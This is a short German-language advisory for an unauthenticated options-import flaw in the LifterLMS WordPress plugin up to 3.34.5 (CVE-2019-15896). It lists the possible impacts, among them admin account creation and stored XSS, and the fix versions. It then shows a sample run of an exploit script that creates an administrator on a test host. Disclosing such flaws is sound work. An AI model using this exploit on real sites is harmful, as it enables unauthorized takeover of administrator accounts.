
LifterLMS <= 3.34.5 - Nicht authentifizierter Options-Import
LifterLMS <= 3.34.5 - Nicht authentifizierter Options-Import
Nicht authentifizierter Options-Import, der zu Folgendem führen kann:
Website-Weiterleitung
Erstellung von Administratorkonten
Inhaltsinjektion
Gespeichertes XSS
Die Probleme wurden Berichten zufolge in 3.35.0 behoben. Allerdings fügte v3.35.1 zusätzliche Eingabebereinigung und -filterung hinzu.
$ python3 CVE-2019-15896.py --url http://wordpress.lan --username radmin --email [email protected] LifterLMS <= 3.34.5 - Unauthenticated Options Import Exploit By Ramdom Robbie Once ran check your email for the forgotten password link. Password reset email sent to [email protected]
Info
---
Requires access to login.php and working email address and the site needs to be able to send emails